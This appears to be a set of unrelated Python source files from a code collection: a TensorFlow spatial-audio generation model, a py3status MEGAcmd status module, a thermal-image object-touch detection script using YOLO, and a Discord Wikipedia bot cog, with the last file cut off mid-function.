#
# tree.p.SetPtEtaPhiM(gauss(.5, 1.),
# gauss(.5, 1.),
# gauss(.5, 1.),
# gauss(.5, 1.))
#
# tree.i = i
# tree.fill(reset=True)
# tree.write()
#
# f.close()
|
py | 7df9f276d27fb051fac868d590a5ca207393538c | import numpy as np
import tensorflow as tf
import pyutils.tflib.wrappers as tfw
from pyutils.tflib.models.image.resnet import ResNet18
from collections import OrderedDict
import myutils
from definitions import *
class SptAudioGenParams:
def __init__(self,
sep_num_tracks=NUM_SEP_TRACKS_DEF,
ctx_feats_fc_units=CTX_FEATS_FCUNITS_DEF,
loc_fc_units=LOC_FCUNITS_DEF,
sep_freq_mask_fc_units=SEP_FREQ_MASK_FCUNITS_DEF,
sep_fft_window=SEP_FFT_WINDOW_DEF):
self.sep_num_tracks = sep_num_tracks
self.ctx_feats_fc_units = ctx_feats_fc_units
self.loc_fc_units = loc_fc_units
self.sep_freq_mask_fc_units = sep_freq_mask_fc_units
self.sep_fft_window = sep_fft_window
class SptAudioGen(object):
def __init__(self, ambi_order,
audio_rate=48000,
video_rate=10,
context=1.,
sample_duration=0.1,
encoders=None,
separation='none',
params=SptAudioGenParams()):
assert float(audio_rate)/video_rate == int(audio_rate)/int(video_rate)
self.ambi_order = ambi_order
self.num_ambi_channels = sum([2*i+1 for i in range(ambi_order+1)])
self.snd_rate, self.vid_rate = audio_rate, video_rate
self.context, self.duration = context, sample_duration
self.snd_contx = int(context * audio_rate)
self.snd_dur = int(sample_duration * audio_rate)
self.snd_size = self.snd_contx + self.snd_dur - 1
assert self.snd_rate % self.vid_rate == 0
if encoders is None:
encoders = [AUDIO, VIDEO, FLOW]
assert isinstance(encoders, list)
assert all([e in ENCODERS for e in encoders])
self.encoders = encoders
self.separation = separation
self.params = params
self.model = None
self.deploy = None
self.solver = None
self.ends = OrderedDict()
self.init_ops = []
self.loc_channels = None
self.sep_channels = None
self.wind_size = int(self.params.sep_fft_window * self.snd_rate)
self.wind_size = int(2**np.round(np.log2(self.wind_size)))
@staticmethod
def _stft_mse_ops(gt, pred, window, overlap):
with tf.variable_scope('stft_diff'):
with tf.variable_scope('stft_gt'):
# stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap)
stft_gt = myutils.stft_for_loss(gt, window, overlap)
with tf.variable_scope('stft_pred'):
# stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap)
stft_pred = myutils.stft_for_loss(pred, window, overlap)
with tf.variable_scope('mse'):
stft_diff = tf.abs(stft_gt-stft_pred)
mse = tf.reduce_mean(tf.reduce_mean(stft_diff**2, axis=3), axis=2)
return mse
@staticmethod
def _lsd_ops(gt, pred, window, overlap):
EPS = 1e-2
with tf.variable_scope('lsd'):
with tf.variable_scope('stft_gt'):
stft_gt = myutils.stft(tf.transpose(gt, (0, 2, 1)), window, overlap)
with tf.variable_scope('stft_pred'):
stft_pred = myutils.stft(tf.transpose(pred, (0, 2, 1)), window, overlap)
with tf.variable_scope('lsd'):
def power_spect(x):
return 10 * tf.log(tf.abs(x)+EPS) / tf.log(10.)
log_spec_diff = (power_spect(stft_gt) - power_spect(stft_pred))
lsd_t = tf.sqrt(tf.reduce_mean(log_spec_diff**2, axis=3))
lsd = tf.reduce_mean(lsd_t, axis=2)
return lsd
@staticmethod
def _temporal_mse_ops(gt, pred):
with tf.variable_scope('mse'):
return tf.reduce_mean((gt - pred)**2, axis=1)
@staticmethod
def _temporal_snr_ops(gt, pred):
EPS = 1e-1
with tf.variable_scope('snr'):
Psignal = tf.reduce_sum(gt**2, axis=1)
Pnoise = tf.reduce_sum((gt-pred)**2, axis=1)
snr = 10. * tf.log((Psignal+EPS)/(Pnoise+EPS)) / tf.log(10.)
return snr
def evaluation_ops(self, preds_t, targets_t, w_t, mask_channels=None):
print('\n Metrics')
print(' * {:15s} | {:20s} | {:10s}'.format('Prediction', str(preds_t.get_shape()), str(preds_t.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Target', str(targets_t.get_shape()), str(targets_t.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Channel mask', str(mask_channels.get_shape()), str(mask_channels.dtype)))
if mask_channels is None:
batch_size, _, n_channels = preds_t.get_shape()
mask_channels = tf.ones((batch_size, n_channels))
num_masked = tf.reduce_sum(mask_channels, axis=0)
num_masked = tf.maximum(num_masked, 1)
metrics = OrderedDict()
window = int(FFT_WINDOW * self.snd_rate)
overlap = FFT_OVERLAP_R
stft_dist_ps = self._stft_mse_ops(targets_t, preds_t, window, overlap)
stft_dist = tf.reduce_sum(stft_dist_ps * mask_channels, axis=0) / num_masked * 100.
metrics['stft/avg'] = tf.reduce_mean(stft_dist)
for i, ch in zip(range(3), 'YZX'):
metrics['stft/'+ch] = stft_dist[i]
lsd_ps = self._lsd_ops(targets_t, preds_t, window, overlap)
lsd = tf.reduce_sum(lsd_ps * mask_channels, axis=0) / num_masked
metrics['lsd/avg'] = tf.reduce_mean(lsd)
for i, ch in zip(range(3), 'YZX'):
metrics['lsd/'+ch] = lsd[i]
mse_ps = self._temporal_mse_ops(targets_t, preds_t)
mse = tf.reduce_sum(mse_ps * mask_channels, axis=0) / num_masked * 5e3
metrics['mse/avg'] = tf.reduce_mean(mse)
for i, ch in zip(range(3), 'YZX'):
metrics['mse/'+ch] = mse[i]
snr_ps = self._temporal_snr_ops(targets_t, preds_t)
snr = tf.reduce_sum(snr_ps * mask_channels, axis=0) / num_masked
metrics['snr/avg'] = tf.reduce_mean(snr)
for i, ch in zip(range(3), 'YZX'):
metrics['snr/'+ch] = snr[i]
metrics['pow/pred'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(preds_t ** 2, axis=2), axis=0))
metrics['pow/gt'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(targets_t ** 2, axis=2), axis=0))
for m in metrics:
print(' * {:15s} | {:20s} | {:10s}'.format(m, str(metrics[m].get_shape()), str(metrics[m].dtype)))
return metrics, stft_dist_ps, lsd_ps, mse_ps, snr_ps
def loss_ops(self, metrics_t, step_t):
losses = OrderedDict()
losses['stft/mse'] = metrics_t['stft/avg']
return losses
def audio_encoder_ops(self, stft):
n_filters = [32, 64, 128, 256, 512]
filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)]
stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)]
inp_dim = 95. # Encoder Dim=1
ss = (self.snd_contx / 2.) * (4. / self.wind_size)
ss = int(ss - (inp_dim - 1) / 2.)
tt = (self.snd_contx / 2. + self.snd_dur) * (4. / self.wind_size)
tt = int(tt + (inp_dim - 1) / 2.)
tt = int((np.ceil((tt - ss - inp_dim) / 16.)) * 16 + inp_dim + ss)
sz = stft.get_shape().as_list()
stft = tf.transpose(stft[:, :, ss:tt, :], (0,2,3,1))
print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(stft.get_shape()), str(stft.dtype)))
x = tf.abs(stft)
print(' * {:15s} | {:20s} | {:10s}'.format('Magnitude', str(x.get_shape()), str(x.dtype)))
downsampling_l = [x]
for l, nf, fs, st in zip(range(len(n_filters)), n_filters, filter_size, stride):
name = 'conv{}'.format(l+1)
x = tfw.conv_2d(x, nf, fs, padding='VALID', activation_fn=tf.nn.relu, stride=st, name=name)
downsampling_l.append(x)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
return downsampling_l
def visual_encoding_ops(self, inp, is_training=True, finetune=False, scope=None):
vid_units = 512
inp_shape = tuple(inp.get_shape().as_list())
print(' * {:15s} | {:20s} | {:10s}'.format('Input', str(inp.get_shape()), str(inp.dtype)))
x = tf.reshape(inp, shape=(inp_shape[0]*inp_shape[1],) + inp_shape[2:])
print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype)))
cnn = ResNet18()
x, ends = cnn.inference_ops(x, finetune, truncate_at='conv5_2')
init_ops = cnn.restore_pretrained(inp_shape[-1], scope)
self.init_ops.extend(init_ops)
self.ends.update([(scope+'/'+key, val) for key, val in ends.iteritems()])
return x
def bottleneck_ops(self, x_enc, use_audio=True):
if len(x_enc) == 0:
return None
bottleneck = []
audio_sz = x_enc[AUDIO][-1].get_shape().as_list()
for k in [AUDIO, VIDEO, FLOW]:
if k == AUDIO and not use_audio:
continue
if k in x_enc:
x = x_enc[k][-1] if k == AUDIO else x_enc[k]
print(' * {:15s} | {:20s} | {:10s}'.format(k+'-feats', str(x.get_shape()), str(x.dtype)))
if k != AUDIO:
name = k+'-fc-red'
x = tfw.fully_connected(x, 128, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
sz = x.get_shape().as_list()
out_shape = (sz[0], sz[1], sz[2]*sz[3]) if k == AUDIO else (sz[0], 1, sz[1]*sz[2]*sz[3])
x = tf.reshape(x, out_shape)
print(' * {:15s} | {:20s} | {:10s}'.format(k+'-reshape', str(x.get_shape()), str(x.dtype)))
name = k+'-fc'
n_units = 1024 if k == AUDIO else 512
x = tfw.fully_connected(x, n_units, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
if k in [VIDEO, FLOW]:
x = tf.tile(x, (1, audio_sz[1], 1))
print(' * {:15s} | {:20s} | {:10s}'.format(k+' tile', str(x.get_shape()), str(x.dtype)))
bottleneck.append(x)
bottleneck = tf.concat(bottleneck, 2)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(bottleneck.get_shape()), str(bottleneck.dtype)))
return bottleneck
def localization_ops(self, x):
num_out = (self.ambi_order + 1) ** 2 - self.ambi_order ** 2
num_in = self.ambi_order ** 2
# Localization
for i, u in enumerate(self.params.loc_fc_units):
name = 'fc{}'.format(i+1)
x = tfw.fully_connected(x, u, activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
# Compute localization weights
name = 'fc{}'.format(len(self.params.loc_fc_units)+1)
x = tfw.fully_connected(
x, num_out*num_in*(self.params.sep_num_tracks+1), activation_fn=None,
weights_initializer=tf.truncated_normal_initializer(stddev=0.001),
weight_decay=0, name=name) # BS x NF x NIN x NOUT
sz = x.get_shape().as_list()
x = tf.reshape(x, (sz[0], sz[1], num_out, num_in, self.params.sep_num_tracks+1))
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
sz = x.get_shape().as_list()
x = tf.tile(tf.expand_dims(x, 2), (1, 1, self.snd_dur/sz[1], 1, 1, 1))
x = tf.reshape(x, (sz[0], self.snd_dur, sz[2], sz[3], sz[4]))
print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(x.get_shape()), str(x.dtype)))
weights = x[:, :, :, :, :-1]
print(' * {:15s} | {:20s} | {:10s}'.format('weights', str(weights.get_shape()), str(weights.dtype)))
biases = x[:, :, :, :, -1]
print(' * {:15s} | {:20s} | {:10s}'.format('biases', str(biases.get_shape()), str(biases.dtype)))
return weights, biases
def separation_ops(self, mono, stft, audio_enc, feats, scope='separation'):
if self.separation == NO_SEPARATION:
ss = self.snd_contx / 2
x_sep = mono[:, :, ss:ss + self.snd_dur] # BS x 1 x NF
x_sep = tf.expand_dims(x_sep, axis=1)
self.ends[scope + '/' + 'all_channels'] = x_sep
print(' * {:15s} | {:20s} | {:10s}'.format('Crop Audio', str(x_sep.get_shape()), str(x_sep.dtype)))
return x_sep
elif self.separation == FREQ_MASK:
n_filters = [32, 64, 128, 256, 512]
filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)]
stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)]
name = 'fc-feats'
feats = tfw.fully_connected(feats, n_filters[-1], activation_fn=tf.nn.relu, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(feats.get_shape()), str(feats.dtype)))
sz = feats.get_shape().as_list()
enc_sz = audio_enc[-1].get_shape().as_list()
feats = tf.tile(tf.expand_dims(feats, 2), (1, 1, enc_sz[2], 1))
feats = tf.reshape(feats, (sz[0], sz[1], enc_sz[2], sz[2]))
print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(feats.get_shape()), str(feats.dtype)))
x = tf.concat([audio_enc[-1], feats], axis=3)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype)))
# Up-convolution
n_chann_in = mono.get_shape().as_list()[1]
for l, nf, fs, st, l_in in reversed(zip(range(len(n_filters)), [self.params.sep_num_tracks*n_chann_in,]+n_filters[:-1], filter_size, stride, audio_enc[:-1])):
name = 'deconv{}'.format(l+1)
x = tfw.deconv_2d(x, nf, fs, stride=st, padding='VALID', activation_fn=None, name=name)
print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype)))
if l == 0:
break
x = tf.concat((tf.nn.relu(x), l_in), 3)
print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype)))
# Crop
ss = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size))
tt = np.ceil((self.snd_contx / 2. + self.snd_dur + self.wind_size) * (4. / self.wind_size))
inp_dim = 95. # Encoder Dim=1
skip = (self.snd_contx / 2.) * (4. / self.wind_size)
skip = int(skip - (inp_dim - 1) / 2.)
stft = stft[:, :, int(ss):int(tt)]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop STFT', str(stft.get_shape()), str(stft.dtype)))
x = x[:, int(ss-skip):int(tt-skip), :]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop deconv1', str(x.get_shape()), str(x.dtype)))
x = tf.transpose(x, (0, 3, 1, 2))
print(' * {:15s} | {:20s} | {:10s}'.format('Permute', str(x.get_shape()), str(x.dtype)))
x_sz = x.get_shape().as_list()
x = tf.reshape(x, (x_sz[0], n_chann_in, -1, x_sz[2], x_sz[3]))
print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype)))
# Apply Mask
f_mask = tf.cast(tf.sigmoid(x), dtype=tf.complex64)
print(' * {:15s} | {:20s} | {:10s}'.format('Sigmoid', str(f_mask.get_shape()), str(f_mask.dtype)))
stft_sep = tf.expand_dims(stft, 2) * f_mask
print(' * {:15s} | {:20s} | {:10s}'.format('Prod', str(stft_sep.get_shape()), str(stft_sep.dtype)))
# IFFT
x_sep = myutils.istft(stft_sep, 4)
print(' * {:15s} | {:20s} | {:10s}'.format('ISTFT', str(x_sep.get_shape()), str(x_sep.dtype)))
ss = self.snd_contx / 2.
skip = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size)) * (self.wind_size / 4.)
skip += 3. * self.wind_size / 4. # ISTFT ignores 3/4 of a window
x_sep = x_sep[:, :, :, int(ss-skip):int(ss-skip)+self.snd_dur]
print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(x_sep.get_shape()), str(x_sep.dtype)))
else:
raise ValueError('Unknown separation mode.')
self.ends[scope + '/' + 'all_channels'] = x_sep
return x_sep
def inference_ops(self, audio, video=None, flow=None, is_training=True):
audio = tf.transpose(audio, (0, 2, 1)) # BATCH_SIZE x N_CHANNELS x N_FRAMES
tensors = [audio, video, flow]
names = ['audio', 'video', 'flow']
print('Inputs')
for t, n in zip(tensors, names):
if t is not None:
self.ends[n] = t
print(' * {:15s} | {:20s} | {:10s}'.format(n, str(t.get_shape()), str(t.dtype)))
# STFT (0.025s windows, 25% hop)
print('\nSTFT')
stft = myutils.stft(audio, self.wind_size, 4)
print(' * {:15s} | {:20s} | {:10s}'.format('Mono', str(audio.get_shape()), str(audio.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('STFT', str(stft.get_shape()), str(stft.dtype)))
x_enc = {}
# Audio encoder
if AUDIO in self.encoders:
print('\nAudio encoder')
scope = 'audio_encoder'
with tf.variable_scope(scope):
x_enc[AUDIO] = self.audio_encoder_ops(stft)
# Video encoder
if VIDEO in self.encoders:
print('\nVideo encoder')
scope = 'video_encoder'
with tf.variable_scope(scope):
x_enc[VIDEO] = self.visual_encoding_ops(
video, is_training=is_training, finetune=True, scope=scope)
# Flow encoder
if FLOW in self.encoders:
print('\nFlow encoder')
scope = 'flow_encoder'
with tf.variable_scope(scope):
x_enc[FLOW] = self.visual_encoding_ops(
flow, is_training=is_training, finetune=True, scope=scope)
# Mixer
print('\nBottleneck')
scope = 'bottleneck'
with tf.variable_scope(scope):
feats = self.bottleneck_ops(x_enc, AUDIO in self.encoders)
# Localization coefficients
scope = 'localization'
print('\n Localization')
with tf.variable_scope(scope):
weights, biases = self.localization_ops(feats)
self.loc_channels = [weights, biases]
# Source separation
scope = 'separation'
print('\n Separation')
with tf.variable_scope(scope):
x_sep = self.separation_ops(audio, stft, x_enc[AUDIO] if len(x_enc) else None, feats, scope)
self.sep_channels = x_sep
self.inp_spect = tf.abs(stft)
# Decode ambisonics
scope = 'decoder'
print('\n Ambix Generation')
x_sep = tf.transpose(x_sep, (0, 3, 1, 2))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Audio', str(x_sep.get_shape()), str(x_sep.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Weights', str(weights.get_shape()), str(weights.dtype)))
print(' * {:15s} | {:20s} | {:10s}'.format('Input Biases', str(biases.get_shape()), str(biases.dtype)))
with tf.variable_scope(scope):
# Predict ambisonics (A_t = W_t*s_t + b_t)
x_ambi = tf.reduce_sum(tf.reduce_sum(weights * tf.expand_dims(x_sep, axis=2), axis=4), axis=3) + biases[:,:,:,0]
self.ends[scope + '/ambix'] = x_ambi
print(' * {:15s} | {:20s} | {:10s}'.format('Ambix', str(x_ambi.get_shape()), str(x_ambi.dtype)))
return x_ambi
|
py | 7df9f2be5d3b9dfe578f73877ee22b7a69607991 | # -*- coding: utf-8 -*-
"""
Display status of MEGAcmd.
Configuration parameters:
cache_timeout: refresh interval for this module (default 10)
format: display format for the module (default "MEGA {format_sync}|No MEGA")
format_sync: display format for every sync (default "{syncstate}")
format_sync_separator: show separator if more than one sync (default " ")
Format placeholders:
{format_sync} Format for every sync returned by 'mega-sync' command.
format_sync placeholders:
Any column returned by 'mega-sync' command - in lower case!
For example: id, syncstate, localpath
Requires:
MEGAcmd: command-line interface for MEGA
@author Maxim Baz (https://github.com/maximbaz)
@license BSD
SAMPLE OUTPUT
{'full_text': 'MEGA Synced'}
"""
STRING_NOT_INSTALLED = "MEGAcmd is not installed"
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 10
format = "MEGA {format_sync}|No MEGA"
format_sync = "{syncstate}"
format_sync_separator = " "
def post_config_hook(self):
if not self.py3.check_commands("mega-sync"):
raise Exception(STRING_NOT_INSTALLED)
def mega_sync(self):
output = self.py3.command_output("mega-sync").splitlines()
format_sync = None
if len(output) > 0:
columns = output[0].lower().split()
megasync_data = []
for line in output[1:]:
cells = dict(zip(columns, line.split()))
megasync_data.append(self.py3.safe_format(self.format_sync, cells))
format_sync_separator = self.py3.safe_format(self.format_sync_separator)
format_sync = self.py3.composite_join(format_sync_separator, megasync_data)
return {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(
self.format, {"format_sync": format_sync}
),
}
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
py | 7df9f3cf83c5f77142e54d48cef2e32e2f7d435b | #!/usr/bin/env python
#Copyright 2017 Martin Cooney
#This file is subject to the terms and conditions defined in file 'Readme.md', which is part of this source code package.
import numpy as np
import cv2
from subprocess import call
import sys
import math
#--------------------------------------------------------
# Setup
#--------------------------------------------------------
#Some default alignment parameters for the default dataset of touching objects:
#(please replace these with your own parameters if using different data)
shiftx = 38
shifty = 0
zoomFactorX = 0
zoomFactorY = 20
alpha = 0.7
shiftUp = 60
#Object parameters
#For the dataset the following five items were used:
#(please change if you use different data)
groundTruthObjects = [ ]
groundTruthLocations = [ ]
groundTruthObjects.append("PET bottle")
groundTruthObjects.append("ceramic cup")
groundTruthObjects.append("paper box")
groundTruthObjects.append("HDPE bottle")
groundTruthObjects.append("glass")
groundTruthLocations.append((227, 205))
groundTruthLocations.append((192, 207))
groundTruthLocations.append((153, 197))
groundTruthLocations.append((118, 182))
groundTruthLocations.append((77, 199))
#Detection parameters
PADDING_PARAMETER = 0.35 #used to remove part of the bounding boxes of detected objects, which often are rough and contain background along the perimeters
SD_THRESHOLD = 10 #used to detect if an object has varied temperature, which could be the result of a touch
INTENSITY_THRESHOLD = 20 #used to select the lighter (warmest) part within a bounding box
AREA_THRESHOLD = 10 #used to remove small dots of noise
APPROXIMATION_THRESHOLD = 0.03 #used for approximating the shape of touches to compute the surface to area ratio
SURFACE_AREA_THRESHOLD = 0.6 #used to remove long thin noise along the outlines of objects (from reflections or warm/cold backgrounds)
#Other parameters
width = 320
height = 240
#get passed arguments and select filenames:
#please change these as needed to match where folders are on your system
basename = sys.argv[0]
beforeBaseName = sys.argv[1]
conditionName = sys.argv[2]
correctAnswer = int (sys.argv[3])
rgbFileName1 = "%s/%s_rgb.jpg" % (basename, beforeBaseName)
thermalFileName1 = "%s/%s_thermal_obj.jpg" % (basename, beforeBaseName)
thermalFileName2 = "%s/%s_thermal.jpg" % (basename, beforeBaseName)
shifted_RGB_filename = '../../data/objects/my_rgb_shifted.jpg'
objectDetectionResults_filename = '../../output/object_detection_results.txt'
darknetFolder = '../../../../darknet/'
outputLogFileName = '../../output/%s_resultsLogFile.dat' % conditionName
outputImageFilename = "../../data/objects/output/out_%s.jpg" % beforeBaseName
#read in images to process
image_rgb = cv2.imread(rgbFileName1)
image_rgb = cv2.resize(image_rgb, (width, height))
image_thermal = cv2.imread(thermalFileName1)
image_thermal = cv2.resize(image_thermal, (width, height))
#align mask and rgb for both before and after
shifted_rgb = image_rgb[shifty+zoomFactorY:240-zoomFactorY, 0+zoomFactorX:320-shiftx-zoomFactorX]
shifted_rgb = cv2.resize(shifted_rgb, (width, height))
shifted_thermal = image_thermal[0+shiftUp:240-shifty, shiftx:320]
shifted_thermal = cv2.resize(shifted_thermal, (width, height))
#to store predictions
touchedItems = [ ]
print ""
print "= Detect object touches in a single frame (MAY 2017) ="
print beforeBaseName
#--------------------------------------------------------
# Detect objects
#--------------------------------------------------------
#Call YOLO/Darknet
cv2.imwrite(shifted_RGB_filename, shifted_rgb)
yoloCommand = "%sdarknet detect %scfg/yolo.cfg %syolo.weights %s" % (darknetFolder, darknetFolder, darknetFolder, shifted_RGB_filename)
call(yoloCommand, shell=True)
#read in the object detection results file, which describes every object in 6 lines
f = open(objectDetectionResults_filename, 'r')
l = list(f)
f.close()
totalLines = len(l)
numberOfObjects = totalLines/6
objectNames = []
boxCentroids = []
boxSizes = []
print "Detected", numberOfObjects, "objects"
for currentObjectIndex in range(numberOfObjects):
objectLabel = l[currentObjectIndex*6].rstrip()
guessProb = l[currentObjectIndex*6+1].rstrip()
centerX = float(l[currentObjectIndex*6+2])
centerY = float(l[currentObjectIndex*6+3])
sizeX = float(l[currentObjectIndex*6+4])
sizeY = float(l[currentObjectIndex*6+5])
objectNames.append(objectLabel)
boxCentroids.append([centerX, centerY])
boxSizes.append([sizeX, sizeY])
#--------------------------------------------------------
# Detect touches in the object regions
#--------------------------------------------------------
#make mask image from bounding boxes
gray_therm = cv2.cvtColor(shifted_thermal, cv2.COLOR_BGR2GRAY)
for currentObjectIndex in range(len(boxCentroids)):
currentObj = objectNames[currentObjectIndex]
if currentObj != "person" and currentObj != "diningtable" and currentObj != "chair" and currentObj != "sofa":
centerX = boxCentroids[currentObjectIndex][0]
centerY = boxCentroids[currentObjectIndex][1]
sizeX = boxSizes[currentObjectIndex][0]
sizeY = boxSizes[currentObjectIndex][1]
p1_x = int((centerX-(sizeX/2))*width)
p1_y = int((centerY-(sizeY/2))*height)
p2_x = int((centerX+(sizeX/2))*width)
p2_y = int((centerY+(sizeY/2))*height)
boundingBoxRegion = gray_therm[p1_y:p2_y, p1_x:p2_x]
reducedBoundingBoxRegion = boundingBoxRegion.copy()
cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), (p2_y- p1_y)), 0, thickness=10)
cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), int(float(p2_y-p1_y) * PADDING_PARAMETER)), 0, thickness=-1)
ret1, thresholdedImage1 = cv2.threshold(reducedBoundingBoxRegion, 2, 255, cv2.THRESH_BINARY)
(means, stds) = cv2.meanStdDev(reducedBoundingBoxRegion, mask = thresholdedImage1)
print currentObj, " Mean: ", means[0][0], " SD: ", stds[0][0]
if stds[0][0] > SD_THRESHOLD:
print " SD high. Possibly a touch."
ret2, thresholdedImage2 = cv2.threshold(reducedBoundingBoxRegion, (means[0][0] + INTENSITY_THRESHOLD), 255, cv2.THRESH_BINARY)
#(_, cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 3...
(cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 2.4
if len(cnts) > 0:
for cnt in cnts:
theArea = cv2.contourArea(cnt)
print " Area: ", theArea
if theArea > AREA_THRESHOLD:
# approximate the contour
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, APPROXIMATION_THRESHOLD * peri, True)
surfaceToArea = peri/theArea
print " Surface to area ratio: ", surfaceToArea
if surfaceToArea < SURFACE_AREA_THRESHOLD:
print " Touch predicted."
#draw the touch contour
boundingBoxRegion_rgb2 = shifted_rgb[p1_y:p2_y, p1_x:p2_x]
cv2.drawContours(boundingBoxRegion_rgb2, [cnt], -1, 255, -1)
shifted_rgb[p1_y:p2_y, p1_x:p2_x] = boundingBoxRegion_rgb2
#find the centroid of the touch and draw
mom = cv2.moments(cnt)
centroid_x = int(mom['m10']/mom['m00'])
centroid_y = int(mom['m01']/mom['m00'])
centroid_x = centroid_x + p1_x
centroid_y = centroid_y + p1_y
cv2.circle(shifted_rgb, (centroid_x, centroid_y), 3, (0, 0, 255))
#find closest box centroid
minDistance = 9999.9
closestObjectId = -1
for anObjectIndex in range(len(groundTruthLocations)):
anObject = groundTruthObjects[anObjectIndex]
if anObject == "person" or anObject == "diningtable" or anObject == "chair" or anObject == "sofa":
continue
c_x = groundTruthLocations[anObjectIndex][0]
c_y = groundTruthLocations[anObjectIndex][1]
cv2.circle(shifted_rgb, (c_x, c_y), 3, (0, 255, 0))
currentDistance = math.sqrt((centroid_x - c_x)*(centroid_x - c_x) + (centroid_y - c_y)*(centroid_y - c_y))
if currentDistance < minDistance:
minDistance = currentDistance
closestObjectId = anObjectIndex
print " Closest Object Id: ", closestObjectId
print " Object Name: ", groundTruthObjects[closestObjectId]
cv2.putText(shifted_rgb, groundTruthObjects[closestObjectId], (10, 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 0))
touchedItems.append(closestObjectId)
else:
print " Shape not round. Probably not a touch."
else:
print " Small area. Probably not a touch."
resultsLogFile = open(outputLogFileName, 'a')
#--------------------------------------------------------
# Output results
#--------------------------------------------------------
if len(touchedItems) == 1:
print "one touch detected"
lineToWrite = "%s %d %d \n" % (beforeBaseName, correctAnswer, touchedItems[0]+1)
resultsLogFile.write(lineToWrite)
else: #if no touches or multiple touches detected, output -1 and show the array
print "No touches or multiple touches detected"
lineToWrite = "%s %d -1 %s \n" % (beforeBaseName, correctAnswer, touchedItems)
resultsLogFile.write(lineToWrite)
resultsLogFile.close()
cv2.imwrite(outputImageFilename, shifted_rgb)
print ""
|
py | 7df9f54ed191972d06e0566065968a2915efbecf | import discord, wikipedia
from discord.ext import commands
from discord.ext.commands import cooldown, BucketType, CommandOnCooldown, guild_only
from wikipedia.wikipedia import search
class Wikipedia(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(aliases=("Wikipedia_menu", "Wiki_menu", "wiki_menu"))
@guild_only()
async def wikipedia_menu(self, ctx):
if ctx.message.author.is_on_mobile():
embed = discord.Embed(title="Wikipedia menu (but for mobile)", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red())
embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url)
embed.add_field(name="1️⃣wiki_summary", value="**It is a quick (or long) summary on the article you type in**")
embed.add_field(name="2️⃣wiki_search", value="**I recommend using this command first so that way you can understand what to type in correctly**")
embed.add_field(name="3️⃣wiki_page", value="**this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D**")
await ctx.send(embed=embed)
return
embed = discord.Embed(title="Wikipedia menu", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red())
embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url)
embed.add_field(name="wiki_summary", value="It is a quick (or long) summary on the article you type in")
embed.add_field(name="wiki_search", value="I recommend using this command first so that way you can understand what to type in correctly")
embed.add_field(name="wiki_page", value="this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D")
await ctx.send(embed=embed)
return
@commands.command(aliases=("Wiki_search", "Wikipedia_search", "wikipedia_search"))
@guild_only()
async def wiki_search(self, ctx, *, search=""):
if search == "" or search == " ":
await ctx.send("you didn't put anything to search for")
if ctx.message.channel.id == 693942287910305842:
final = ""
lst = wikipedia.search(search)
for i in lst:
final += i + "\n"
await ctx.send("a list of articles:" + "\n" + "```" + "\n" + final + "```")
else:
await ctx.send(f"this command is only allowed in <#693942287910305842>")
return
@cooldown(1, 10, BucketType.user)
@commands.command()
@guild_only()
async def wiki_summary(self, ctx, * , search=""):
if search == "" or search == " ":
